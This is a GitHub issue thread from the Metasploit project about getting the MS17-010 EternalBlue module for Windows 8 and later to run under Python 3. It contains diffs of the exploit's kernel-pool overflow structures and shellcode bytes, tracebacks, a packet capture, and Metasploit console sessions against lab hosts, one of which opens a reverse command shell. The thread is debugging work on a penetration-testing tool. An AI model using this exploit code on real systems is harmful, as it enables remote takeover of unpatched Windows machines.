Closed acammack-r7 closed 3 years ago
The first issue (with the plain python
shebang) looks to be due to using python 2 and having the first line of cli.py
that pulls in the forwards compatibility print
function removed somehow. Those errors do not occur in Python 3 or in Python 2.7 or 2.6 with the file as is in the in the repo.
I have confirmed the pack
ing issues in all the Python 3 versions I have on hand, Python 3.8.2, 3.7.7, and 3.6.9. Perhaps @busterb can shed some light since he landed https://github.com/rapid7/metasploit-framework/pull/12524 where it was supposed to be converted.
@acammack-r7 To be honest, I am still a beginner and learning. So I have a question. Is it a bug that will be fixed? or Is there a solution?
Welcome, @hothefa1998! I would expect that this will get fixed, or at least that there will be another way to run MS17-010 against Windows 8 & 10 era targets. The code worked well enough under Python 2 that we know it is possible to get working successfully again, it's a matter of finding where the behavior under the newer Pythons is from the old ones and then changing it back (likely with gratuitous use of b"..."
literals). Saying a fix is right around the corner is always risky, though, especially in open source software where there's always more work to be done than workers and priorities can change quickly.
@kal1s, looking at your output a little more, I have a couple of observations:
diff -u
makes diff output much easier to read for humans (and is the format git
uses)bytes
or b'...'
literals, which was the default way 2.x treats strings.@kal1s, looking at your output a little more, I have a couple of observations:
- Using
diff -u
makes diff output much easier to read for humans (and is the formatgit
uses)- I think we'll want to go the other direction for strings and bytes, with everything intended to go over the network needing to be
bytes
orb'...'
literals, which was the default way 2.x treats strings.
Hi @acammack-r7 , following the diff -u
result and make sense of what you are saying about the direction of the casting.
$ diff -u ms17_010_eternalblue_win8.py ms17_010_eternalblue_win8.py.kal1s
--- ms17_010_eternalblue_win8.py 2020-05-17 13:22:54.547224850 -0300 +++ ms17_010_eternalblue_win8.py.kal1s 2020-05-16 16:32:38.850346127 -0300 @@ -139,8 +139,8 @@ '\x11\x4d\x89\xc1\x4d\x8b\x09\x4d\x39\xc8\x0f\x84\xc6\x00\x00' '\x00\x4c\x89\xc8\x4c\x29\xf0\x48\x3d\x00\x07\x00\x00\x77\xe6' '\x4d\x29\xce\xbf\xe1\x14\x01\x17\xe8\xbb\x00\x00\x00\x8b\x78'
NTFEA_SIZE = 0x9000
-ntfea9000 = (pack('<BBH', 0, 0, 0) + '\x00')0x260 # with these fea, ntfea size is 0x1c80 -ntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\x00'0x735d # 0x8fe8 - 0x1c80 - 0xc = 0x735c -ntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\x00'0x8148 # overflow to SRVNET_BUFFER_HDR +ntfea9000 = (pack('<BBH', 0, 0, 0) + '\x00'.encode())0x260 # with these fea, ntfea size is 0x1c80 +ntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\x00'.encode()0x735d # 0x8fe8 - 0x1c80 - 0xc = 0x735c +ntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\x00'.encode()0x8148 # overflow to SRVNET_BUFFER_HDR
''' Reverse from srvnet.sys (Win2012 R2 x64) @@ -269,20 +269,20 @@ SHELLCODE_PAGE_ADDR = (TARGET_HAL_HEAP_ADDR + 0x400) & 0xfffffffffffff000 PTE_ADDR = 0xfffff6ffffffe800 + 8((SHELLCODE_PAGE_ADDR-0xffffffffffd00000) >> 12) fakeSrvNetBufferX64Nx = '\x00'16 -fakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) +fakeSrvNetBufferX64Nx += str(pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)) fakeSrvNetBufferX64Nx += '\x00'16 fakeSrvNetBufferX64Nx += '\x00'16 -fakeSrvNetBufferX64Nx += pack('<QQ', 0, 0) -fakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAPADDR) # , _, pointer to fake struct -fakeSrvNetBufferX64Nx += pack('<QQ', 0, 0) +fakeSrvNetBufferX64Nx += str(pack('<QQ', 0, 0)) +fakeSrvNetBufferX64Nx += str(pack('<QQ', 0, TARGET_HAL_HEAPADDR)) # , _, pointer to fake struct +fakeSrvNetBufferX64Nx += str(pack('<QQ', 0, 0)) fakeSrvNetBufferX64Nx += '\x00'16 fakeSrvNetBufferX64Nx += '\x00'16 -fakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags -fakeSrvNetBufferX64Nx += pack('<QQ', 0, PTE_ADDR+7-0x7f) # MDL.Process, MDL.MappedSystemVa +fakeSrvNetBufferX64Nx += str(pack('<QHHI', 0, 0x60, 0x1004, 0)) # MDL.Next, MDL.Size, MDL.MdlFlags +fakeSrvNetBufferX64Nx += str(pack('<QQ', 0, PTE_ADDR+7-0x7f)) # MDL.Process, MDL.MappedSystemVa
feaListNx = pack('<I', 0x10000) feaListNx += ntfea9000 -feaListNx += pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx # -1 because first '\x00' is for name +feaListNx += pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx.encode() # -1 because first '\x00' is for name
feaListNx += pack('<BBH', 0x12, 0x34, 0x5678)
@@ -291,23 +291,23 @@
totalRecvSize = 0x80 + 0x180 + sc_size
fakeSrvNetBufferX64 = '\x00'*16
fakeSrvNetBufferX64 += str(pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80)) # MDL.Process, MDL.MappedSystemVa return fakeSrvNetBufferX64
def createFeaList(sc_size): feaList = pack('<I', 0x10000) feaList += ntfea9000 fakeSrvNetBuf = createFakeSrvNetBuffer(sc_size)
feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf.encode() # -1 because first '\x00' is for name
feaList += pack('<BBH', 0x12, 0x34, 0x5678) return feaList @@ -325,14 +325,14 @@
fake_recv_struct = ('\x00'16)5 -fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself) -fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0) # offset 0x60 +fake_recv_struct += str(pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58)) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself) +fake_recv_struct += str(pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0)) # offset 0x60 fake_recv_struct += ('\x00'16)10 -fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x170, 0) # offset 0x110: fn_ptr array -fake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0) # set arg1 to -0x8150 -fake_recv_struct += pack('<QII', 0, 0, 3) # offset 0x130 +fake_recv_struct += str(pack('<QQ', TARGET_HAL_HEAP_ADDR+0x170, 0)) # offset 0x110: fn_ptr array +fake_recv_struct += str(pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0)) # set arg1 to -0x8150 +fake_recv_struct += str(pack('<QII', 0, 0, 3)) # offset 0x130 fake_recv_struct += ('\x00'16)3 -fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180) # shellcode address +fake_recv_struct += str(pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180)) # shellcode address
def getNTStatus(self): @@ -679,7 +679,7 @@ smbpass = args['SMBPass'] if 'SMBPass' in args else ''
sc = eternalblue_kshellcode_x64(args['ProcessName']) + str(b64decode(args['payload_encoded']))
if len(sc) > 0xe80: module.log('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80), 'error')
I don't know the difference between **Metasploit** from **Kali Linux Repo** and from **Metasploit GitHub** but yesterday I realized that the exploit **ms17_010_eternalblue** doesn't work too and that is strange because this exploit is made in Ruby, not in Python.
So today I removed the Metasploit from Kali Linux Repo and installed the Metasploit from [Metasploit Framework Nightly Installers](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers) and now this exploit is working nicely.
Now I just need to test the **ms17_010_eternalblue_win8**, that I'll do in the next days because I'm having some problems with the Windows Target.
### Steps that I did to Install Metasploit Framework Nightly on Kali Linux
- Remove, Install, and Configure:
msf5 > version Framework: 5.0.90-dev- Console : 5.0.90-dev-
### Running an Attack
- Running an attack to a **Windows Server 2008 R2** using the exploit **ms17_010_eternalblue**:
msf5 > use windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.1.60 rhosts => 172.16.1.60
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[] Started reverse TCP handler on 172.20.1.119:4444
[] 172.16.1.60:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.1.60:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7600 x64 (64-bit)
[] 172.16.1.60:445 - Scanned 1 of 1 hosts (100% complete)
[] 172.16.1.60:445 - Connecting to target for exploitation.
[+] 172.16.1.60:445 - Connection established for exploitation.
[+] 172.16.1.60:445 - Target OS selected valid for OS indicated by SMB reply
[] 172.16.1.60:445 - CORE raw buffer dump (38 bytes)
[] 172.16.1.60:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[] 172.16.1.60:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[] 172.16.1.60:445 - 0x00000020 65 20 37 36 30 30 e 7600
[+] 172.16.1.60:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[] 172.16.1.60:445 - Trying exploit with 12 Groom Allocations.
[] 172.16.1.60:445 - Sending all but last fragment of exploit packet
[] 172.16.1.60:445 - Starting non-paged pool grooming
[+] 172.16.1.60:445 - Sending SMBv2 buffers
[+] 172.16.1.60:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[] 172.16.1.60:445 - Sending final SMBv2 buffers.
[] 172.16.1.60:445 - Sending last fragment of exploit packet!
[] 172.16.1.60:445 - Receiving response from exploit packet
[+] 172.16.1.60:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[] 172.16.1.60:445 - Sending egg to corrupted connection.
[] 172.16.1.60:445 - Triggering free of corrupted buffer.
[-] 172.16.1.60:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.1.60:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.1.60:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[] 172.16.1.60:445 - Connecting to target for exploitation.
[+] 172.16.1.60:445 - Connection established for exploitation.
[+] 172.16.1.60:445 - Target OS selected valid for OS indicated by SMB reply
[] 172.16.1.60:445 - CORE raw buffer dump (38 bytes)
[] 172.16.1.60:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[] 172.16.1.60:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[] 172.16.1.60:445 - 0x00000020 65 20 37 36 30 30 e 7600
[+] 172.16.1.60:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[] 172.16.1.60:445 - Trying exploit with 17 Groom Allocations.
[] 172.16.1.60:445 - Sending all but last fragment of exploit packet
[] 172.16.1.60:445 - Starting non-paged pool grooming
[+] 172.16.1.60:445 - Sending SMBv2 buffers
[+] 172.16.1.60:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[] 172.16.1.60:445 - Sending final SMBv2 buffers.
[] 172.16.1.60:445 - Sending last fragment of exploit packet!
[] 172.16.1.60:445 - Receiving response from exploit packet
[+] 172.16.1.60:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[] 172.16.1.60:445 - Sending egg to corrupted connection.
[] 172.16.1.60:445 - Triggering free of corrupted buffer.
[] Command shell session 2 opened (172.20.1.119:4444 -> 172.16.1.60:58703) at 2020-05-19 13:25:34 -0300
[+] 172.16.1.60:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.1.60:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.1.60:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
C:\Windows\system32>
### Next Steps
- In the next days I'll test the exploit **ms17_010_eternalblue_win8** and I'll let you know about the results.
@kal1s
Hi @acammack-r7, as I've promised, today I tested the exploit ms17_010_eternalblue_win8 using the Metasploit Framework from Metasploit GitHub Nightly.
In this time I didn't make any changes in the exploit.
It doesn't work and I founded another issue, so like this issue isn't related to the Python 3 problem, I think you'll want to open another issue.
So because of that, I'll report what a founded to help to solve this new issue.
# cat /etc/os-release
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2020.2"
VERSION_ID="2020.2"
VERSION_CODENAME="kali-rolling"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"
# apt show metasploit-framework
Package: metasploit-framework
Version: 5.0.90+20200520102413.git.2.33708c2~1rapid7-1
Priority: extra
Section: misc
Maintainer: Rapid7 Release Engineering <r7_re@rapid7.com>
Installed-Size: 510 MB
Homepage: https://rapid7.com
License: Unspecified
Vendor: Omnibus <omnibus@getchef.com>
Download-Size: 223 MB
APT-Manual-Installed: yes
APT-Sources: http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid/main amd64 Packages
Description: The full stack of metasploit-framework
msf5 > version
Framework: 5.0.90-dev-
Console : 5.0.90-dev-
$ python --version
Python 2.7.18
- **Python 3**:
$ python3 --version
Python 3.8.3rc1
### Steps to Reproduce
- Fresh Installation of the [Windows 2012 R2](https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2012-r2) with the MS17-010 Vulnerability:
- On Metasploit looking for the Vulnerability:
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set smbuser administrator smbuser => administrator
msf5 auxiliary(scanner/smb/smb_ms17_010) > set smbpass ** smbpass => **
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.122.168 rhosts => 192.168.122.168
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.122.168:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Datacenter Evaluation 9600 x64 (64-bit) [] 192.168.122.168:445 - Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed
- Running the exploit `ms17_010_eternalblue_win8` against the Windows Target:
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue_win8
- Error on the `framework.log` when I executed the last command:
[05/20/2020 14:03:23] [e(0)] core: /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb failed to load due to the following error: Errno::ENOENT No such file or directory @ rb_sysopen - /opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb Call stack: /opt/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:77:in initialize' /opt/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:77:in
open' /opt/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:77:in read_module_content' /opt/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/base.rb:127:in
load_module' /opt/metasploit-framework/embedded/framework/lib/msf/core/module_manager/cache.rb:91:in block in load_cached_module' /opt/metasploit-framework/embedded/framework/lib/msf/core/module_manager/cache.rb:86:in
each' /opt/metasploit-framework/embedded/framework/lib/msf/core/module_manager/cache.rb:86:in load_cached_module' /opt/metasploit-framework/embedded/framework/lib/msf/core/module_set.rb:45:in
create' /opt/metasploit-framework/embedded/framework/lib/msf/core/module_manager.rb:90:in create' /opt/metasploit-framework/embedded/framework/lib/msf/ui/console/command_dispatcher/modules.rb:697:in
cmd_use' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:523:in run_command' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:474:in
block in run_single' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in each' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:468:in
run_single' /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:158:in run' /opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:48:in
start' /opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/base.rb:82:in start' /opt/metasploit-framework/bin/../embedded/framework/msfconsole:23:in
- Configuring the Exploit:
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > set rhost 192.168.122.168 rhost => 192.168.122.168
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > set smbuser administrator smbuser => administrator
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > set smbpass ** smbpass => **
- Running the Exlpoit 2 times:
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run
[] Started reverse TCP handler on 192.168.122.1:4444 [] shellcode size: 1232 [] numGroomConn: 13 [] Target OS: Windows Server 2012 R2 Datacenter Evaluation 9600 [] got good NT Trans response [] got good NT Trans response [-] 'ascii' codec can't decode byte 0xd3 in position 2: ordinal not in range(128) [-] Exploit aborted due to failure: unknown: Module exited abnormally [*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run
[] Started reverse TCP handler on 192.168.122.1:4444 [] shellcode size: 1232 [] numGroomConn: 13 [] Target OS: Windows Server 2012 R2 Datacenter Evaluation 9600 [] got good NT Trans response [] got good NT Trans response [-] 'ascii' codec can't decode byte 0x87 in position 4: ordinal not in range(128) [-] Exploit aborted due to failure: unknown: Module exited abnormally [*] Exploit completed, but no session was created.
- Each time that I execute the exploit the byte and the position change.
- No more errors in the `framework.log`.
----------------------------------------------------------------------------------------------------------------
**@kal1s**
That's a known issue with with the module under Python 2. Under some circumstances something about the SMB data and impacket disagree and a field that was assumed to be ascii is really a binary. I tried looking at it once, but it can be hard to reproduce on a VM on demand and once I could, it turned out to be a large rabbithole I didn't have time to go down. I think a full python 3 conversion could coincidentally fix it by making sure everything is properly bytes.
Originally posted by @kal1s in https://github.com/rapid7/metasploit-framework/issues/13458#issuecomment-629835823
Hi guys!
I'm having the same problem with the ms17_010_eternalblue_win8 exploit were in my Kali Linux is using Python3 on the shebangs but the exploit doesn't work.
I needed to break some things here to understand what happening and I think I have some advances.
Only changing the shebangs is not sufficient because a lot of syntaxes and programming language was changed from Python2 to Python3.
It needs to do some porting from Python2 to Python3, see: https://docs.python.org/3/howto/pyporting.html
I solve some problems but my lack of knowledge of the exploit is a blocked road to me continue to solve this problem.
I think all other exploits in Python2 that are going to Python3 will suffer the same problem that we are describing here.
In resume was needed to change a lot of string and byte concatenation where in Python3 is mandatory to cast the type to the type that is receiving the value, see: https://stackoverflow.com/questions/606191/convert-bytes-to-a-string.
So let me show to you guys what I did to have a palliative and incomplete solution.
My Versions
Steps to Reproduce the Python2 Version
[05/17/2020 15:10:33] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py, unknown module type [05/17/2020 15:10:33] [e(0)] core: /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb failed to load due to the following error: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb Call stack: /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in'
[05/17/2020 15:10:33] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py:
Traceback (most recent call last):
File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 15, in
from metasploit import module
File "/usr/share/metasploit-framework/lib/msf/core/modules/external/python/metasploit/module.py", line 6, in
from metasploit import cli
File "/usr/share/metasploit-framework/lib/msf/core/modules/external/python/metasploit/cli.py", line 10
print(*args, file=sys.stderr, **kwargs)
^
SyntaxError: invalid syntax
initialize' /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in
open' /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:inread_module_content' /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:127:in
load_module' /usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:91:inblock in load_cached_module' /usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:86:in
each' /usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:86:inload_cached_module' /usr/share/metasploit-framework/lib/msf/core/module_set.rb:45:in
create' /usr/share/metasploit-framework/lib/msf/core/module_manager.rb:90:increate' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:697:in
cmd_use' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:450:incmd_search' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:701:in
cmd_use' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:inrun_command' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in
block in run_single' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:ineach' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in
run_single' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:158:inrun' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in
start' /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:instart' /usr/bin/msfconsole:23:in
[05/17/2020 15:10:33] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py, unknown module type
msf5 > info exploit/windows/smb/ms17_010_eternalblue_win8
[-] Invalid module: exploit/windows/smb/ms17_010_eternalblue_win8
[05/17/2020 13:14:40] [e(0)] core: /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb failed to load due to the following error: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb Call stack: /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in'
[05/17/2020 13:14:40] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py:
Traceback (most recent call last):
File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, in
ntfea9000 = (pack('<BBH', 0, 0, 0) + '\x00')*0x260 # with these fea, ntfea size is 0x1c80
TypeError: can't concat str to bytes
initialize' /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in
open' /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:inread_module_content' /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:127:in
load_module' /usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:91:inblock in load_cached_module' /usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:86:in
each' /usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:86:inload_cached_module' /usr/share/metasploit-framework/lib/msf/core/module_set.rb:45:in
create' /usr/share/metasploit-framework/lib/msf/core/module_manager.rb:90:increate' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:162:in
block in cmd_info' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:161:ineach' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:161:in
cmd_info' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:inrun_command' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in
block in run_single' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:ineach' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in
run_single' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:158:inrun' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in
start' /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:instart' /usr/bin/msfconsole:23:in
[05/17/2020 13:14:40] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py, unknown module type
$ diff ms17_010_eternalblue_win8.py ms17_010_eternalblue_win8.py.kal1s
142,143c142,143 < '\x03\x83\xc7\x08\x48\x8d\x34\x19\xe8\xf4\x00\x00\x00\x3d' + proc_hash + < '\x74\x10\x3d' + proc_hash + '\x74\x09\x48\x8b\x0c'
msf5 > info exploit/windows/smb/ms17_010_eternalblue_win8
Platform: Windows Arch: x64 Privileged: Yes License: Metasploit Framework License (BSD) Rank: Average Disclosed: 2017-03-14
Provided by: Equation Group Shadow Brokers sleepya wvu wvu@metasploit.com
Available targets: Id Name
0 win x64
Check supported: No
Basic options: Name Current Setting Required Description
GroomAllocations 13 yes Initial number of times to groom the kernel pool. ProcessName spoolsv.exe no Process to inject payload into. RHOST yes Target server RPORT 445 yes Target server port SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as
Payload information:
Description: EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) The exploit support only x64 target Tested on: - Windows 2012 R2 x64 - Windows 8.1 x64 - Windows 10 Pro Build 10240 x64 - Windows 10 Enterprise Evaluation Build 10586 x64 Default Windows 8 and later installation without additional service info: - anonymous is not allowed to access any share (including IPC$) - More info: https://support.microsoft.c om/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows
References: https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010 https://cvedetails.com/cve/CVE-2017-0143/ https://cvedetails.com/cve/CVE-2017-0144/ https://cvedetails.com/cve/CVE-2017-0145/ https://cvedetails.com/cve/CVE-2017-0146/ https://cvedetails.com/cve/CVE-2017-0147/ https://cvedetails.com/cve/CVE-2017-0148/ https://www.exploit-db.com/exploits/42030 https://github.com/worawit/MS17-010
Also known as: ETERNALBLUE
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > set rhost 172.16.1.60
rhost => 172.16.1.60
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > options
Module options (exploit/windows/smb/ms17_010_eternalblue_win8):
Name Current Setting Required Description
GroomAllocations 13 yes Initial number of times to groom the kernel pool. ProcessName spoolsv.exe no Process to inject payload into. RHOST 172.16.1.60 yes Target server RPORT 445 yes Target server port SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as
Exploit target:
Id Name
0 win x64
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run
[] Started reverse TCP handler on 172.20.1.119:4444 [] shellcode size: 1960 [] numGroomConn: 13 [-] Missing required parameter 'digestmod'. [-] Exploit aborted due to failure: unknown: Module exited abnormally [] Exploit completed, but no session was created.
tcpdump -i tun0 -n host 172.16.1.60
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes 13:36:42.046252 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [S], seq 568799431, win 64240, options [mss 1460,sackOK,TS val 296807334 ecr 0,nop,wscale 7], length 0 13:36:42.294913 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [S.], seq 3814031721, ack 568799432, win 8192, options [mss 1358,nop,wscale 8,sackOK,TS val 40782235 ecr 296807334], length 0 13:36:42.294998 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [.], ack 1, win 502, options [nop,nop,TS val 296807583 ecr 40782235], length 0 13:36:42.296648 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [P.], seq 1:52, ack 1, win 502, options [nop,nop,TS val 296807585 ecr 40782235], length 51 13:36:42.602182 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [.], ack 52, win 257, options [nop,nop,TS val 40782261 ecr 296807585], length 0 13:36:42.602259 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [P.], seq 1:210, ack 52, win 257, options [nop,nop,TS val 40782261 ecr 296807585], length 209 13:36:42.602284 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [.], ack 210, win 501, options [nop,nop,TS val 296807890 ecr 40782261], length 0 13:36:42.610347 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [P.], seq 52:192, ack 210, win 501, options [nop,nop,TS val 296807898 ecr 40782261], length 140 13:36:42.909451 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [P.], seq 210:605, ack 192, win 257, options [nop,nop,TS val 40782291 ecr 296807898], length 395 13:36:42.909510 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [.], ack 605, win 501, options [nop,nop,TS val 296808198 ecr 40782291], length 0 13:36:42.919345 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [F.], seq 192, ack 605, win 501, options [nop,nop,TS val 296808208 ecr 40782291], length 0 13:36:43.216441 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [.], ack 193, win 257, options [nop,nop,TS val 40782322 ecr 296808208], length 0 13:36:43.216568 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [R.], seq 605, ack 193, win 0, length 0